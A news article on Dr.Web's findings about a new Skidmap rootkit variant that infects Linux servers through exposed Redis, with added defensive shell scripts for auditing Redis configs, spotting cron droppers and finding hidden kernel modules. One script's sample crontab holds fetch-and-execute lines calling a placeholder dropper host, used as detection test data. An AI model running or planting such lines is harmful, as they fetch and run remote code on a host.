Cybersecurity researchers at Dr.Web have uncovered a new modification of the Skidmap rootkit, a sophisticated malware targeting Linux systems to covertly install crypto-mining trojans. This latest variant employs advanced techniques to conceal its activities, posing a significant threat to enterprise servers and cloud environments.
The Anatomy of Skidmap’s Latest Attack
The Skidmap rootkit is a malicious kernel module. It hides the miner by falsifying the CPU load and network activity figures that monitoring tools read from the kernel, which makes unauthorized mining very hard for system administrators to spot.
Dr.Web’s experts note that these attacks are widespread and primarily target the corporate sector, where high-performance servers and cloud infrastructures provide optimal conditions for efficient crypto-mining operations.
Exploiting Redis Vulnerabilities
The researchers found that many of these attacks exploit weaknesses in Redis, an open-source in-memory data structure store. Redis is designed to be reached only by trusted clients inside a trusted network, not exposed directly to the internet, and its default configuration offers little more than protected mode. Releases before 6.0 have no per-user access control lists and no native TLS; the only authentication available is a single shared password (requirepass), which is commented out in the default configuration. An instance bound to a public interface in that state accepts any command from anyone.
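The following shell script is an added example, not code from Dr.Web or the Redis project. It audits a redis.conf for the exposure pattern described above: reachable on every interface, protected mode off, no authentication, CONFIG still callable. The directive names are real Redis settings; the two sample configuration files it writes are constructed for illustration, and the address 10.0.0.5 is a placeholder.

```shell
#!/bin/sh
# Added example (not Dr.Web's or the Redis project's code): audit a redis.conf
# for the exposure the article describes: reachable on every interface, no
# authentication, CONFIG still callable. Directive names are real Redis
# settings; both sample files below are constructed for illustration and the
# address 10.0.0.5 is a placeholder.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/weak.conf" <<'EOF'
# constructed sample: the kind of instance that draws honeypot traffic
bind 0.0.0.0
protected-mode no
port 6379
EOF

cat > "$WORK/hardened.conf" <<'EOF'
# constructed sample: same server with the exposure removed
bind 127.0.0.1 10.0.0.5
protected-mode yes
port 6379
# Redis >= 6.0: turn off the default user, give the application its own
# credentials and deny the 'dangerous' command group (CONFIG, DEBUG, ...)
user default off
user app on >CHANGE-ME-long-random-secret ~app:* +@read +@write -@dangerous
# pre-6.0 equivalent is 'requirepass' plus renaming CONFIG away
rename-command CONFIG ""
EOF

# audit_redis_conf FILE: print one FINDING line per weakness and set the
# global AUDIT_FINDINGS to their number. Always returns 0 so it is safe to
# call under 'set -e'.
audit_redis_conf() {
    AUDIT_FINDINGS=0
    # effective directives only: drop comments and blank lines
    eff=$(grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' || :)

    # 1. no 'bind' at all, or bound to every interface
    if ! printf '%s\n' "$eff" | grep -q '^bind ' \
       || printf '%s\n' "$eff" | grep -Eq '^bind .*(0\.0\.0\.0|\*| ::( |$))'; then
        echo "FINDING: $1: reachable on all interfaces (no restrictive bind)"
        AUDIT_FINDINGS=$((AUDIT_FINDINGS + 1))
    fi
    # 2. protected mode off (Redis >= 3.2 otherwise refuses non-loopback
    #    clients when no bind and no password are configured)
    if printf '%s\n' "$eff" | grep -Eq '^protected-mode[[:space:]]+no'; then
        echo "FINDING: $1: protected-mode is off"
        AUDIT_FINDINGS=$((AUDIT_FINDINGS + 1))
    fi
    # 3. no authentication: neither the shared password (requirepass) nor a
    #    Redis >= 6.0 ACL 'user' entry
    if ! printf '%s\n' "$eff" | grep -Eq '^(requirepass|user) '; then
        echo "FINDING: $1: no requirepass and no ACL users (unauthenticated)"
        AUDIT_FINDINGS=$((AUDIT_FINDINGS + 1))
    fi
    # 4. CONFIG left callable: CONFIG SET changes runtime settings, including
    #    the directory and file name the server writes its dump to
    if ! printf '%s\n' "$eff" | grep -Eq '^rename-command[[:space:]]+CONFIG[[:space:]]'; then
        echo "FINDING: $1: CONFIG command not renamed or disabled"
        AUDIT_FINDINGS=$((AUDIT_FINDINGS + 1))
    fi
    return 0
}

for f in "$WORK/weak.conf" "$WORK/hardened.conf"; do
    audit_redis_conf "$f"
    echo "$f: $AUDIT_FINDINGS finding(s)"
done
```

The weak sample produces four findings and the hardened one none. Point the function at a real redis.conf to audit a live deployment; the checks are heuristics on the static file, so a server whose settings were changed at runtime with CONFIG SET will not be reflected until they are persisted.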
Honeypot Revelations
To better understand the threat, Dr.Web set up a honeypot: an unprotected Redis server. Over the course of a year, this decoy server saw between 10,000 and 14,000 attack attempts per month. Recently, it was infected with the Skidmap malware, which employed a new concealment method and installed four separate backdoors on the compromised system.
Skidmap’s Evolution and Infection Process
Although Skidmap has been known since 2019, its core functionality remains consistent. The malware typically infiltrates systems by exploiting vulnerabilities or misconfigurations in software. In the case of Dr.Web’s honeypot, attackers added tasks to the cron scheduler, downloading a dropper (Linux.MulDrop.142 or Linux.MulDrop.143) every 10 minutes.
This executable file performs several actions:
- Checks the OS kernel version
- Disables SELinux
- Unpacks the Linux.Rootkit.400 rootkit
- Installs the Linux.BtcMine.815 miner
- Deploys multiple backdoors (Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426, and Linux.BackDoor.RCTL.2)
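The following shell script is an added example, not code from Dr.Web, that looks for the two host-side footprints the chain above leaves before the rootkit is in place: a cron job that keeps re-fetching and running a remote dropper, and SELinux switched off. The crontab and SELinux configuration it scans are constructed samples; the host name dropper.example.invalid and the path /tmp/.d are placeholders, not indicators taken from the report.

```shell
#!/bin/sh
# Added example (not Dr.Web's code): triage checks for the two host-side
# footprints the chain above leaves before the rootkit is in place, a cron
# job that keeps re-fetching a dropper and SELinux switched off. The crontab
# and SELinux config below are constructed samples; the host name
# dropper.example.invalid and the path /tmp/.d are placeholders, not
# indicators from the report. Run with --live to check the current host.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/crontab" <<'EOF'
# constructed sample root crontab: two ordinary jobs, two dropper-style jobs
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/backup-check.sh
*/10 * * * * curl -fsSL http://dropper.example.invalid/x | sh
*/10 * * * * wget -q -O /tmp/.d http://dropper.example.invalid/d && chmod +x /tmp/.d && /tmp/.d
EOF

cat > "$WORK/selinux.conf" <<'EOF'
# constructed sample of /etc/selinux/config after tampering
# SELINUX= can take one of these three values: enforcing, permissive, disabled
SELINUX=disabled
SELINUXTYPE=targeted
EOF

# scan_cron FILE: print cron lines that fetch something over the network and
# run it (piped into a shell, or chmod +x'ed). Any schedule is matched, not
# only */10, because the interval is the attacker's choice. Sets CRON_HITS.
scan_cron() {
    CRON_HITS=0
    while IFS= read -r line; do
        case "$line" in
            ''|\#*) continue ;;
        esac
        if printf '%s\n' "$line" | grep -Eq '(curl|wget).*(https?|ftp)://' \
           && printf '%s\n' "$line" | grep -Eq '\|[[:space:]]*(ba)?sh([[:space:]]|$)|chmod[[:space:]]+[+]x'; then
            echo "SUSPECT cron entry in $1: $line"
            CRON_HITS=$((CRON_HITS + 1))
        fi
    done < "$1"
    return 0
}

# selinux_mode FILE: the mode a SELinux config file applies at boot
# (enforcing, permissive, disabled, or 'unknown' if the line is missing).
selinux_mode() {
    mode=$(sed -n 's/^SELINUX=\([a-z]*\).*/\1/p' "$1" | tail -n 1)
    echo "${mode:-unknown}"
}

scan_cron "$WORK/crontab"
echo "cron hits: $CRON_HITS"
echo "sample SELinux boot config: $(selinux_mode "$WORK/selinux.conf")"

if [ "${1:-}" = "--live" ]; then
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && scan_cron "$f"
    done
    # runtime state and boot config can disagree; compare both
    command -v getenforce >/dev/null 2>&1 && echo "SELinux runtime: $(getenforce)"
    [ -f /etc/selinux/config ] && echo "SELinux boot config: $(selinux_mode /etc/selinux/config)"
fi
```

Against the sample crontab the scan flags the two fetch-and-execute jobs and skips the two ordinary ones. Because the rootkit is loaded after these steps and the article says it hooks system calls, run the live checks from a trusted environment (a rescue boot or a mounted disk image) when you suspect the host is already fully compromised; a kernel that lies about processes may also lie about files.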
Advanced Evasion Techniques
The rootkit intercepts specific system calls, providing fake information in response to diagnostic commands. It also prevents the loading of kernel modules that could detect its presence. This comprehensive approach effectively conceals all aspects of the miner’s activities, including computations, hash submissions, and task reception.
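The following shell script is an added example, not code from Dr.Web, and it shows a general technique for a kernel module that lies to userspace rather than a claim about how this particular sample hides. It runs two cross-view checks: a module that unlinks itself from the kernel's module list disappears from /proc/modules but normally keeps its /sys/module/<name>/ directory, so the two views can be compared; and loading an out-of-tree or unsigned module sets taint bits in /proc/sys/kernel/tainted that stay set until reboot. The module lists are constructed samples and 'hidden_lkm' is a placeholder name.

```shell
#!/bin/sh
# Added example (not Dr.Web's code): two cross-view checks for a kernel module
# that lies to userspace, shown as a general technique rather than a claim
# about how this particular sample hides. (1) A module that unlinks itself
# from the kernel's module list vanishes from /proc/modules but normally keeps
# its /sys/module/<name>/ directory, so the two views disagree. (2) Loading an
# out-of-tree or unsigned module sets taint bits in /proc/sys/kernel/tainted
# that stay set until reboot. Sample data is constructed; 'hidden_lkm' is a
# placeholder name, not an indicator from the report. Run with --live to
# check the current host.

export LC_ALL=C   # sort and comm must agree on collation
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# constructed /proc/modules view (module name is the first field)
cat > "$WORK/proc_modules" <<'EOF'
xt_conntrack 16384 1 - Live 0x0000000000000000
nf_conntrack 172032 1 xt_conntrack, Live 0x0000000000000000
ext4 778240 1 - Live 0x0000000000000000
EOF

# constructed /sys/module view: names of directories that carry an
# 'initstate' file (loadable modules only; built-in code has no initstate)
cat > "$WORK/sys_modules" <<'EOF'
ext4
hidden_lkm
nf_conntrack
xt_conntrack
EOF

# hidden_modules PROC_LIST SYS_LIST: print names present in the /sys view but
# absent from the /proc view.
hidden_modules() {
    awk '{print $1}' "$1" | sort -u > "$WORK/names_proc"
    sort -u "$2" > "$WORK/names_sys"
    comm -13 "$WORK/names_proc" "$WORK/names_sys"   # lines only in the second file
}

# taint_flags VALUE: decode the two taint bits relevant here. Bit 12 (4096)
# is 'O' (out-of-tree module loaded), bit 13 (8192) is 'E' (unsigned module
# loaded). Prints the letters set, or 'none'.
taint_flags() {
    out=""
    [ $(( $1 & 4096 )) -ne 0 ] && out="${out}O"
    [ $(( $1 & 8192 )) -ne 0 ] && out="${out}E"
    echo "${out:-none}"
}

echo "sample: modules in /sys but not /proc: $(hidden_modules "$WORK/proc_modules" "$WORK/sys_modules")"
echo "sample: taint 12288 decodes to $(taint_flags 12288)"

if [ "${1:-}" = "--live" ]; then
    cat /proc/modules > "$WORK/live_proc"
    for d in /sys/module/*/; do
        [ -f "${d}initstate" ] && basename "$d"
    done > "$WORK/live_sys"
    echo "live: modules in /sys but not /proc:"
    hidden_modules "$WORK/live_proc" "$WORK/live_sys"
    echo "live: taint flags: $(taint_flags "$(cat /proc/sys/kernel/tainted)")"
fi
```

On the sample data the module check names hidden_lkm and the taint value 12288 decodes to OE. Treat a non-empty result or an unexpected taint as a reason to take a memory image and verify from outside the host: a rootkit that hooks the system calls behind /proc and /sys can make both views agree, so a clean result from inside a suspected host proves little.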
The installed backdoors serve multiple purposes, including:
- Capturing and transmitting data on every SSH authentication on the host
- Installing a backdoored PAM module (Linux.BackDoor.Pam.8/9) that accepts a single master password for every system account
- Providing remote access and control through the Linux.BackDoor.RCTL.2 RAT
Detection Challenges and Implications
Detecting a rootkit-concealed miner in a server cluster is not trivial. Once the kernel itself lies about CPU load and network traffic, in-guest monitoring can no longer be trusted, and the remaining indicators may be physical ones: higher power draw and heat. Measurements the rootkit cannot reach, such as hypervisor-side CPU accounting for virtual machines or power and thermal telemetry from the hardware, are therefore worth more than anything reported from inside the compromised host. This stealth, combined with the attackers' ability to tune mining for optimal throughput, makes Skidmap a formidable threat to enterprise infrastructure.
The evolution of Skidmap shows how much more elaborate these attacks have become. Disabling protective mechanisms, tampering with numerous system utilities and services, and deploying a kernel-level rootkit all complicate incident response. As crypto-mining campaigns continue to target high-value enterprise infrastructure, organizations need to keep exposed services such as Redis off the public network and behind authentication, and to monitor their hosts in ways a compromised kernel cannot falsify.